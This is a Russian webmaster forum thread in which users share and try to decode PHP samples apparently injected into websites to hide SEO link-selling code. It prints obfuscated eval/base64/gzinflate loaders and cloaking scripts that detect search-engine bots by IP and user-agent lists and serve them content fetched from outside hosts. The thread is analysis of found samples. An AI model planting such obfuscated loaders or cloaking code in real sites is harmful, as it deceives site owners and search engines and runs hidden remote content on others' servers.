сапа, линкфид, трастлинк под хайдом

Тема в разделе "Black list", создана пользователем lordBlack, 28 окт 2010.

Статус темы:
Закрыта.
  1. lordBlack

    lordBlack

    Регистр.:
    29 ноя 2007
    Сообщения:
    620
    Симпатии:
    246
    наболело уже...
    в эту тему сливаю примеры размещения кода бирж.
    если кто декодирует -флаг в руки, будет интересно, самому лень уже.


    Пример №1
    шифруем через зенд, + базе 64
    PHP:
    //Zend library core support. Do not touch until necessary. 
    $a4c9059150202f=str_rot13('tmhapbzcerff');$a4c90591502409=str_rot13(strrev('rqbprq_46rfno')); eval($a4c9059150202f($a4c90591502409('eF59UVFrgzAQ/it7GKTCGK1WRyh9sA9TpOuogxgzhpjEbrRpJxUL9tePO8fottiX75K777vvLrmNls+LcPnySoppEFBK/clDQd7m4fFYdiNZNlUwLXSlPnU1Iponjcj8rXRTcnNPDHHu/jAgreLEQBQT2gk48EWTZ6sBheCJQZYLsJsPMK5XUb8DtDCUl3YyYlBt7dUSp1yN1Tu2sPQoM7/mrsa9NEBoY4m9aXBzNKMAB7zzdJPjjLRFdcT6GAM82TodWIsKL60lKv2N4B+16nPn/4rcY518pLXcm7GlijpknPs/SU8K3dcWd8hfKr53gHDCCeL1wFtfKiHg7D+eAOBr8/w1IR9keUADFr6wqSK2JY4z+wKc08Vt'))); eval($a4c9059150202f($a4c90591502409('eF6dVVuPolgQ/ivz0Ml0J/twAJldMukHbUFxPTAg5whsNhMFbRXsNq00l83+9z11SltHWx820Qh1+arqq4vz4iXZLV9fvvxUDO13TdO/kfu75cM/d5PH9tvbpL7/OrJ8xiyj4xHHYpY/D0zL9RXe8Ql7/PrbQc0Z4aOQWH2f6ewoHvkstljGR0eRHSjOiUUUkvgHy9MOy3zLt4xeoNiAK5ycQPEtgWn6Foo4t1iez5nij0ZM74NIROUCPlScgU/0Drf4yPce9wA+ZzzgkFyWXcF0VnEyXNnE5WUxbqKdy5UpfSJ6KN/b4p28gVnjCzOzdk7E4ZOOpqMtInFhwqd0SZTwhplEEkHzbTkM8vRP5ddAqxQC6bcCNQNhQsujeHdEK2XttFl8GuAMyQ0cCKbRvCzcAPKya2ePIIoNn1oV7XZArFCrLISsJeNb4KVCinRlN9Ks8TA1sM4qELl7zw9qMrBUIRZdefWRVJ0qUqRKoFW2Dy9xna40UcRz47YxsyCDVx2BbF081x+hWYmhcwT2DrW0wMoVNbjdBaSiS6BIkTFW4Amc2iWQgs71Hp+AJ23aJ8PSSDKCRMGEvZMYlYsq6bWnEqunUE/LUYBp5Ep22q4QzKykR9eUfelKhhvJMMbRaHsPBoREUHXjSE9KjknLMaYrhtwhleghkgaW+VYdBot03Jgw6edj84tpkMOoVGeLQFdtHSmGoswS6r2qFmOjfKZu4ejQ1tk8ChJVpDs/MKbjUpJP1Bqqn6+o9Ztqr7oJ7gHn5FKs3syY3QZlzc2UmHbb+0pB2C1cBNFzetnIpLk4VXKIYGBb2J0royBNdDCh+aWJvEMmkf0O8nM1TIYjdsjpLi7O06qtycICmHMPdrZFnx+PW2HimQiY3CmnG51snwLD4+DlqukBUNZb4pVqSy8a2Hgu7P1Eprgh0sQrr6tk24NMqqiMaSoUbx2eDdx0jElrLJ8+XmyhqaFKrvSk75MEVzhWjfdYrXLxmKiVkrzI2zINnSJaGxD88KMNFqlagjLROpu4x+HOJWtjOdXkBRkBpulsJ2NepIgdabye4iMzFx4YjfVsNurQyXhQR+EAKuCqUcdWp45DpxGvnrpYJOvqPe37kFOqpVqi+XmCDWH9nEx6RgGacLCd9vIlZNH7iAMS8IHHfl7MUMr76SZS+TYOZReStbWL1tUBdDa2ClEP/JvMLd7EoZikzHqJxzoJu5tp2KfPYWD8McH7jZ8w3y2G4aYz5Jt01rDtHJXRuNpOtXQOyYVq/C4yKw58d1/fh1rnNXlSBEd2EanGbtgYm7hLSNRkpROIr/hbcnuUHLizjM10nZP/g/Dw/W22K95evkwn29m31s90lryms/u7yV93y78fvv/7H7HP6nI='))); eval($a4c9059150202f($a4c90591502409('eF6F1l2PmkAUBuC/wm5Mlolmw3wPoSTa1n4kdm1Qe2MMoa5mN91owq4Xzcb/3pmRtrwU6IXI8XAOD0ccHORROh7ki2n2bZqtcxpzzblUURiRTTLIaXuS+iRrT7IqOfg4m7+dzBbrm1woFcexpDq/2ayjTWjTxB7D2xtw30C0J4VPyvak9EnVnlQ+qduT2idNe9L4ZNyejG1yfzpsXx6Ph+ApzyN7dXRkD7cvGtmNsi/mAkpe7ZalRVkWP8P6OCMyqocUQ4Yhx1BgKDFUGGoMDYYxhAxVDFUMVQxVDFUMVQxVDFUMVQxVHFUcVRxVHFUcVRxVHFUcVRxVHFUCVQJVAlUCVQJVAlUCVQJVAlUCVRJVElUSVRJVElUSVRJVElUSVRJVClUKVQpVClUKVUoSt45Q/u9vSqFQoVChUKFQo1CjUKNQo1CjUOPcNKo0qjSqNKoMqgyqDKoMqgyqDKoMqgyqjLkMuXNBp5v64A2qY6u26yb1LUT6Up52bk+m++Lp2e+qv7s6rVfamv2x3BXbB7eksqB4Duy7IY/7sIvCNuG1O+baLcDEr7eiav/ddvqRnF2x/ZDUOvOqc9zXmbunFo0v13KVpoHv2nOGoDjcX3V1EzCymFUzgnb1RkFXI+lZ5E1aHk+H+zAaslstG5uWth3dlH80u2dWo6bcvZzKgxuSSM5jnxn/51mX2PNcjkyrUfWcWOM8OCHpnyuKbplsbKxut304jrvaGWwn7A183llD0EOIscaew42ARd23vf0j4+5qRuGuVfazrgrq5xuN3q2y2fzrMrdvbmC0p4Q1Sj5NJ++n2agaDump5I3KbLpcZXfLbHK3+GA7uF9iT7VoVC8/f5nOV8vfJx7K4WXtZd1/9Ki89CCJ+7ICd2xyPv8CZ5V5Yg==')));  ?>
    Пример №2

    PHP:
    <?php 
    Error_Reporting
    (E_ERROR); 
    $u=strtolower($_SERVER["HTTP_USER_AGENT"]); 
    if (
    strstr($u,"crawler")or strstr($u,"googlebot")or strstr($u,"msnbot")or strstr($u,"yahoo")or strstr($u,"search")or strstr($u,"bing")or strstr($u,"indexer")or strstr($u,"cuill.com")or strstr($u,"clushbot")) 
    {eval(
    gzinflate(base64_decode('FctND4IgGADgn2PegmWX1iVlmE1qL80PLg2UhgqTTfuwX1+dnz36Ke1KyUlvN7dWN2OrV4GohFGx6eqKWdbDXdCiVxjsKW57TvyrdhEI5GeVMln09lFaw4UdlnNVDIAEEsQwtR4XmRwGTgi+pkOk3XHJK5Al8WPtEFc0mwV9d4DNWOMI2uL/Ic8dTD+nDc4SVnqZu/nBEXwuvPGn67QPwnD3BQ==')));}; 
    ?>
    еще один )))
    PHP:
    <?
    @eval(
    gzinflate(base64_decode('tVdtc+I2EP7c/AofzQwwJQTJL9hJmQtNnJeZhKQGer2S1COMAM8Zm8qmCb3Lf++ueLPB4e6m00yMZe3us8+upJV0GHPxNxcu8zw+TdyAhaMZG3GloZwdum3b+c12esXrTufBbZ6f2w8d97bZuuo2r+zi0+nB4dJ4FiPCiIdJjl0XvlwwaHWkieDDHCXHvrQd2wGNpcJMBDz0ogEvYUd542scxXleru/bnTSlYSSemRjwAbZy9H93L++dD03nwr7AVtpU8EmUcJcNBluGjn1337Hd5sVFRv+vGRdzN06EH46yBr92beej2+44N62rtEXsj0KWzMRWmhdvt31z1Wp2uo6dJQVutiN3bPDQ7rhd5yat60/38h7OQi/xo1AZ8IR7yS9RUtodyMoGrHI4mbswHphJN4hGlbzAKzhMlUMesn7AUWsEneXPBwr8HcZJNAWg2J2w+FMM5JgQbF6SQvwrGMZjlWrWY7VnHFlPvRr8QBtfPxUqqHF8rFxF0Sjg+NHiiQPzlJ9A2zDQsGpo1ZpytPqy9CrV9Q18XXusEqqvILPQO/AZ/LqGltWahF9+AHYW3wBovUeP9Kd8FwB/126t1DP09apOl+jYXoNXsuyNvdw/snEU5TA3NryNHNZ1yIq1PysS+Ue6Q7uOlivei48d/Dp9rKq1b4BXd6hTMFxxl+0dcNXcBt5yAOjnMz8ITnZyrprVFTg0qZ5D3VIhNcjfgtxTWt+QTpG/Y96lHw642NhRAjakBkFTHX+ImbUEqw88CGKlzZnwxsrNTSpdBExxJlGK3lVtx/QmHMyVW78vmJin7MCRhbamdFuoZOclhmJQXF60sDWpCMqoZuDisNJCSpCBhiqAoJppmZwxFgJSWK9ZTCCAYRPTQnCShYQBo/CY8FgZbzJoYiB7+K+lRRKISmc4EGpGKIsGTjBSRwCq7fiTD0aKI5hNiwoRmnUc4IykjoOGkIRgajIhmJhkVV/6q2e54BoFsqq2HLqtGLC2UR2zaljbdhS5EKh85lOPZCpfnp4FQpKnc3w8WpSwoYgmij8N/DiJUwmpIQ8T6dfMPBcbBUn0DQUpV/MBiBwQa5FcS5byN+SY+J75ttzaL9fIfnwNSGpviIz91PWvQOvqfmp6/Sv2b4eGWZOLihhq/tjXc8dFzj1cWVv75q4Gzh2aq4G1jsiSYOWJTbkDaXnDnj/toFqR2rrMklq6zCo+C1l6WslFB3nXYOGZdHs9EqxeRMelrBk761/XF2NCaCZnslzIOoyTnZAMKpFJxtVPMCSq1fZKMzNJJohQrJk4VWi2cBJZcdC5SmV9zS8EpL6ojwdSCIdbfC1OSfLwtX1QKoyTZArbQWGRamzFwUzIrkkc9qMEW8uXJ9hzIFWmPmxO2BLRUnYNOOeBDy6kJhzq8P1w/YCv9PaC3x8iMXgQPI4LleL5mIkgShJerBSfn5/jhAtoPcyTcRRCA4ACvw+NKRcBvOADtLAxD1/g1Xn2PR5IG8Em/UVrzmDzfClC+Mv4cy4TU8FHcPadBszjpcKXLsgeq00UPp70HmPl6f0XH7nCc7YLsIb2Y3c8m7AQEBMx46frI6m7OAPzAUiGLIjXImmfJ1114bkXuguFxejB2Zgz2NFL24ddFm+cYU9Z8YclDmH5pUJGACFsztzlsvJ5PXPS9Jc0lD64+7Rw/Sp/AXWtV17RKeVMqjWhVG+K1I4sP7PKu8aSTPk/EFVgCijvltn4s8eO/mke/fH0Wa+8vjGg+9Oy9JLvBsYLrpQ5V53yzw1CvgsYrzzwlBZ3npzb0HfwFBwuguFG6fQABGdpm7P//552euAPldLGa6OxGtofIFw/9N0RT0pFFgTR89LFlIfFcqNBUId740g5G/qACHquF4UJTp9SEevWyfHxdDw9gpJQ9aLJ8Xt/0ND6Q8NUhyqlZp9jAXg94OAOU7u6nLr8BTeSUhGLlAsMkmIZXR3CGmso684SGEMfcoLub/MHFtI+5jDTIafeuKKcd53b+we8Sd/CMpR45X1613bzwnYqSm2vlmPDNb7VcZqt9iVqY+3Za9C5ubPvu50K7JgysAFLGMS1iJe/cA/VUSIzLsWYvNd/AQ==')));
    ?>

    веселость тут в том, что обычные папки с базой ссылок даже не создаются... которые под кодом идут...
     
  2. o_nix

    o_nix

    Регистр.:
    7 ноя 2007
    Сообщения:
    1.073
    Симпатии:
    1.039

    №2 суть: для ботов поисковиков (буржуйских) показывается контент выданный сервером ... Контент - линки кешируются на стороне сервера
    PHP:
    print file_get_contents('http://sommerandengelhart.com/genall.cgi');
    так что происходит то ?? ломают сайты и эту каку размещают ??
    и непонял причём тут сапа линкфид и прочие ... не под нихже всё это.

    на морде злого сайтека "Ku" такчто наверняка славяне постарались :D

    №3
    PHP:
    $server_accept_language = @$_SERVER['HTTP_ACCEPT_LANGUAGE'];
    $server_user_agent = @$_SERVER['HTTP_USER_AGENT'];
    $ref = @$_SERVER['HTTP_REFERER'];$ref urlencode($ref);
    $server_host = @$_SERVER['HTTP_HOST'];
    $server_forwarded_for = @$_SERVER['HTTP_X_FORWARDED_FOR'];
    $server_remote_addr = @$_SERVER['REMOTE_ADDR'];
    $server_query_string = @$_SERVER['QUERY_STRING'];
    $server_signature = @$_SERVER['SERVER_SIGNATURE'];
    $server_request = @$_SERVER['REQUEST_URI'];
    $server_ip = @$_SERVER['REMOTE_ADDR'];
    function 
    detectBot($server_user_agent,$server_ip,$my_url_for_log,$server_query_string,$ref,$enable_logging){
        
    $stop_ips_masks = array(
            
    "66\.249\.[6-9][0-9]\.[0-9]+",    // Google    NetRange:   66.249.64.0 - 66.249.95.255
            
    "74\.125\.[0-9]+\.[0-9]+",        // Google     NetRange:   74.125.0.0 - 74.125.255.255
            
    "65\.5[2-5]\.[0-9]+\.[0-9]+",    // MSN        NetRange:   65.52.0.0 - 65.55.255.255,
            
    "74\.6\.[0-9]+\.[0-9]+",        // Yahoo    NetRange:   74.6.0.0 - 74.6.255.255
            
    "67\.195\.[0-9]+\.[0-9]+",        // Yahoo#2    NetRange:   67.195.0.0 - 67.195.255.255
            
    "72\.30\.[0-9]+\.[0-9]+",        // Yahoo#3    NetRange:   72.30.0.0 - 72.30.255.255
            
    "38\.[0-9]+\.[0-9]+\.[0-9]+",     // Cuill:     NetRange:   38.0.0.0 - 38.255.255.255
            
    "93\.172\.94\.227",                // MacFinder
            
    "212\.100\.250\.218",            // Wells Search II
            
    "71\.165\.223\.134",            // Indy Library
            
    "70\.91\.180\.25",
            
    "65\.93\.62\.242",
            
    "74\.193\.246\.129",
            
    "213\.144\.15\.38",
            
    "195\.92\.229\.2",
            
    "70\.50\.189\.191",
            
    "218\.28\.88\.99",
            
    "165\.160\.2\.20",
            
    "89\.122\.224\.230",
            
    "66\.230\.175\.124",
            
    "218\.18\.174\.27",
            
    "65\.33\.87\.94",
            
    "67\.210\.111\.241",
            
    "81\.135\.175\.70",
            
    "64\.69\.34\.134",
            
    "89\.149\.253\.169",
            
    "64\.233\.1[6-8][1-9]\.[0-9]+",
            
    "64\.233\.19[0-1]\.[0-9]+",
            
    //google from iplists
            
    "209\.185\.108\.[0-9]+",
            
    "209\.185\.253\.[0-9]+",
            
    "209\.85\.238\.[0-9]+",
            
    "216\.239\.33\.9[6-9]",
            
    "216\.239\.37\.9[8-9]",
            
    "216\.239\.39\.9[8-9]",
            
    "216\.239\.41\.9[6-9]",
            
    "216\.239\.45\.4",
            
    "216\.239\.46\.[0-9]+",
            
    "216\.239\.51\.9[6-9]",
            
    "216\.239\.53\.9[8-9]",
            
    "216\.239\.57\.9[6-9]",
            
    "216\.239\.59\.9[8-9]",
            
    "216\.33\.229\.163",
            
    "64\.233\.173\.[0-9]+",
            
    "64\.68\.8[0-9]\.[0-9]+",
            
    "64\.68\.9[0-2]\.[0-9]+",
            
    "72\.14\.199\.[0-9]+",
            
    "8\.6\.48\.[0-9]+",
            
    //google from iplists
    // 10.0.0.0 - 10.255.255.255 iana
            
    "207\.211\.40\.82",
            
    "67\.162\.158\.146",
            
    "66\.255\.53\.123",
            
    "24\.200\.208\.112",
            
    "129\.187\.148\.240",
            
    "129\.187\.148\.244",
            
    "199\.126\.151\.229",
            
    "118\.124\.32\.193",
            
    "89\.149\.217\.191"

        
    );
        
    $stop_agents_masks = array("http""google""slurp""msnbot""bot""crawl""spider""robot""HttpClient""curl""PHP""Indy Library""WordPress",'Charlotte','wwwster','Python','urllib','perl','libwww','lynx','Twiceler','rambler','yandex');

        
    $server_user_agent preg_replace("|User\.Agent\:[\s ]?|i""", @$server_user_agent);

        
    $is_human true$stop_ip_detected false$stop_agent_detected false$detected_str "";
        foreach (
    $stop_ips_masks as $stop_ip_mask) if(eregi("$stop_ip_mask"$server_ip)) {
            
    $is_human false;  break;
        }
        if(
    $is_human) foreach($stop_agents_masks as $stop_agents_mask) if(eregi($stop_agents_mask, @$server_user_agent) !== false){
            
    $is_human false;  break;
        }
        if(
    $is_human and !eregi("^[a-zA-Z]{5,}", @$server_user_agent)) {
            
    $is_human false;
        }

        if(
    $is_human and strlen($server_user_agent)<=11) {
            
    $is_human false;
        }

        if(
    stristr($ref,$server_query_string)) {
            
    $is_human false;
        }

        return 
    $is_human;
    }

    @
    $is_human = @detectBot($server_user_agent,$server_ip,$my_url_for_log,$server_query_string,$ref,$enable_logging);
    if (@
    $is_human==false){
        if(
    ini_get('allow_url_fopen')==1){
        echo @
    file_get_contents('http://php-lib.com/?id=4bf683f3228be');
    }
    else if(
    function_exists('curl_init')){
        
    $ch curl_init();
        
    $c_url 'http://php-lib.com/?id=4bf683f3228be';
        
    curl_setopt($chCURLOPT_URL$c_url);
        
    curl_setopt($chCURLOPT_HEADER0);
        
    curl_setopt($chCURLOPT_RETURNTRANSFERtrue);
        
    curl_setopt($chCURLOPT_TIMEOUT10);
        
    $data =  curl_exec($ch);
        echo 
    $data;
    }
    }
    Хренасе кода понакуярили o_O
     
    lordBlack нравится это.
Статус темы:
Закрыта.